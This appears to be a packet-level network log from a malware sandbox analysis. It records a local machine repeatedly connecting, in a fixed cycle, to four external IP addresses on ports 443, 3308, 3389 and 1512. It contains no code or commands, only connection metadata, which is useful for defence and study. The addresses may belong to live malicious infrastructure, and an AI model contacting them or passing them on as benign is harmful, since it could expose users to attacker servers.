Jan 12, 2021 07:44:03.982913971 CET	443	49222	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:03.983082056 CET	49222	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:03.984793901 CET	49222	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:04.036866903 CET	443	49222	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:04.051670074 CET	443	49222	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:04.051831007 CET	49222	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:04.066770077 CET	49222	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:04.121257067 CET	443	49222	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:04.121587992 CET	49222	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:04.131967068 CET	49222	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:04.132294893 CET	49222	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:04.184497118 CET	443	49222	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:04.184771061 CET	49222	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:04.236923933 CET	443	49222	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:04.356580019 CET	443	49222	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:04.356609106 CET	443	49222	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:04.356898069 CET	49222	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:04.362762928 CET	49222	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:04.415160894 CET	443	49222	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:04.477464914 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.520867109 CET	3308	49223	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:04.521109104 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.522855043 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.566025019 CET	3308	49223	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:04.576981068 CET	3308	49223	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:04.577019930 CET	3308	49223	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:04.577136993 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.577186108 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.591217995 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.636950016 CET	3308	49223	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:04.637228966 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.650233030 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.650441885 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.693545103 CET	3308	49223	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:04.693742990 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.733107090 CET	3308	49223	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:04.737067938 CET	3308	49223	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:04.849848986 CET	3308	49223	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:04.849878073 CET	3308	49223	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:04.850071907 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.852833033 CET	49223	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:04.896063089 CET	3308	49223	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:04.957343102 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.011430025 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.011533022 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.013029099 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.067867994 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.086203098 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.086234093 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.086337090 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.100701094 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.160218000 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.160391092 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.169657946 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.169893026 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.223937988 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.224020958 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.263180971 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.277770042 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.277792931 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.368907928 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.368935108 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.368988037 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.369021893 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.372730017 CET	49224	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:05.426615953 CET	3389	49224	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:05.489603043 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:05.542614937 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:05.542711973 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:05.543901920 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:05.596900940 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:05.603790998 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:05.603818893 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:05.603908062 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:05.611397982 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:05.665540934 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:05.665802956 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:05.673780918 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:05.673897028 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:05.726886034 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:05.727042913 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:05.765742064 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:05.779952049 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:05.779969931 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:05.880494118 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:05.880517960 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:05.880687952 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:05.886682034 CET	49225	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:05.939826012 CET	1512	49225	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:06.007123947 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.058835030 CET	443	49226	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:06.059042931 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.062679052 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.114151955 CET	443	49226	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:06.128902912 CET	443	49226	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:06.128989935 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.139524937 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.193603992 CET	443	49226	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:06.193721056 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.198239088 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.198498964 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.250032902 CET	443	49226	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:06.250149012 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.301914930 CET	443	49226	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:06.301954031 CET	443	49226	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:06.421371937 CET	443	49226	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:06.421443939 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.421448946 CET	443	49226	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:06.421495914 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.427171946 CET	49226	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:06.479100943 CET	443	49226	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:06.541982889 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.585544109 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:06.585659027 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.587186098 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.630300999 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:06.640937090 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:06.640969992 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:06.641052961 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.641120911 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.655281067 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.700282097 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:06.700372934 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.706620932 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.706844091 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.750004053 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:06.750171900 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.793498039 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:06.906363964 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:06.906400919 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:06.906446934 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.906482935 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.911251068 CET	49228	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:06.954564095 CET	3308	49228	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:07.034214973 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.088031054 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.088196993 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.089421988 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.143199921 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.169168949 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.169186115 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.169246912 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.174355030 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.235759974 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.235903978 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.242624044 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.242779016 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.296137094 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.296369076 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.335408926 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.350023985 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.350039959 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.440506935 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.440526962 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.440623045 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.440673113 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.446563959 CET	49229	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:07.499890089 CET	3389	49229	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:07.562228918 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:07.615394115 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:07.615514040 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:07.616633892 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:07.669790030 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:07.677351952 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:07.677412033 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:07.677431107 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:07.677457094 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:07.687933922 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:07.742374897 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:07.742489100 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:07.804454088 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:07.804740906 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:07.857650995 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:07.857799053 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:07.893688917 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:07.910788059 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:08.011851072 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:08.011873007 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:08.011957884 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:08.014703035 CET	49231	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:08.067811012 CET	1512	49231	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:08.129050016 CET	49232	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:08.181348085 CET	443	49232	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:08.181581020 CET	49232	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:08.183507919 CET	49232	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:08.235795021 CET	443	49232	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:08.250636101 CET	443	49232	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:08.250809908 CET	49232	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:08.273912907 CET	49232	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:08.328519106 CET	443	49232	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:08.328701973 CET	49232	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:08.392585993 CET	49232	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:08.392671108 CET	49232	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:08.444962025 CET	443	49232	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:08.445256948 CET	49232	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:08.497628927 CET	443	49232	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:08.616399050 CET	443	49232	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:08.616429090 CET	443	49232	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:08.616713047 CET	49232	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:08.620304108 CET	49232	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:08.672425985 CET	443	49232	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:08.732120991 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:08.775379896 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:08.775548935 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:08.828816891 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:08.872323036 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:08.882880926 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:08.882944107 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:08.883045912 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:08.886677980 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:08.976831913 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:09.022797108 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:09.023133039 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:09.028312922 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:09.028425932 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:09.071418047 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:09.072938919 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:09.111321926 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:09.115899086 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:09.115951061 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:09.228281021 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:09.228310108 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:09.228630066 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:09.234591961 CET	49233	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:09.277759075 CET	3308	49233	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:09.350187063 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.404326916 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:09.404449940 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.405755043 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.459805012 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:09.474905968 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:09.474951982 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:09.475341082 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.662064075 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.721438885 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:09.721637964 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.726908922 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.727061987 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.780764103 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:09.781033039 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.820732117 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:09.834878922 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:09.834908009 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:09.924911022 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:09.924956083 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:09.924969912 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.925010920 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.927385092 CET	49234	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:09.981573105 CET	3389	49234	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:10.530072927 CET	49235	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:10.582891941 CET	1512	49235	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:10.583045006 CET	49235	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:10.632334948 CET	49235	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:10.685538054 CET	1512	49235	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:10.692174911 CET	1512	49235	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:10.692223072 CET	1512	49235	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:10.692356110 CET	49235	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:10.713442087 CET	49235	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:10.767811060 CET	1512	49235	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:10.767903090 CET	49235	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:10.852035999 CET	49235	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:10.852190018 CET	49235	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:10.904853106 CET	1512	49235	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:10.905059099 CET	49235	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:10.941540956 CET	1512	49235	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:10.957995892 CET	1512	49235	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:11.061505079 CET	1512	49235	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:11.061558008 CET	1512	49235	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:11.061824083 CET	49235	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:11.064014912 CET	49235	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:11.116995096 CET	1512	49235	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:11.223879099 CET	49236	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:11.276079893 CET	443	49236	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:11.276189089 CET	49236	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:11.276902914 CET	49236	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:11.329361916 CET	443	49236	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:11.343770981 CET	443	49236	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:11.343867064 CET	49236	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:11.354091883 CET	49236	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:11.408540964 CET	443	49236	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:11.408787966 CET	49236	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:11.415596008 CET	49236	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:11.415796995 CET	49236	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:11.467818022 CET	443	49236	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:11.468123913 CET	49236	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:11.520332098 CET	443	49236	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:11.638194084 CET	443	49236	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:11.638245106 CET	443	49236	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:11.638452053 CET	49236	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:11.640692949 CET	49236	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:11.692743063 CET	443	49236	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:11.755731106 CET	49237	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:11.799141884 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:11.799309969 CET	49237	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:11.800194979 CET	49237	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:11.843437910 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:11.855401039 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:11.855432987 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:11.855652094 CET	49237	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:11.868180990 CET	49237	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:11.913045883 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:11.913275003 CET	49237	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:11.922555923 CET	49237	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:11.922712088 CET	49237	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:11.965784073 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:11.966100931 CET	49237	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:12.006369114 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:12.009506941 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:12.009552956 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:12.122428894 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:12.122457027 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:12.122730017 CET	49237	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:12.125878096 CET	49237	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:12.168862104 CET	3308	49237	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:12.240328074 CET	49238	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:12.294446945 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.294579029 CET	49238	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:12.295484066 CET	49238	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:12.349252939 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.362937927 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.362963915 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.363058090 CET	49238	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:12.371525049 CET	49238	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:12.431866884 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.431952953 CET	49238	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:12.436928988 CET	49238	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:12.437000036 CET	49238	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:12.491010904 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.491326094 CET	49238	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:12.530864000 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.545584917 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.545608997 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.635677099 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.635725021 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.635808945 CET	49238	3389	192.168.2.22	5.100.228.233
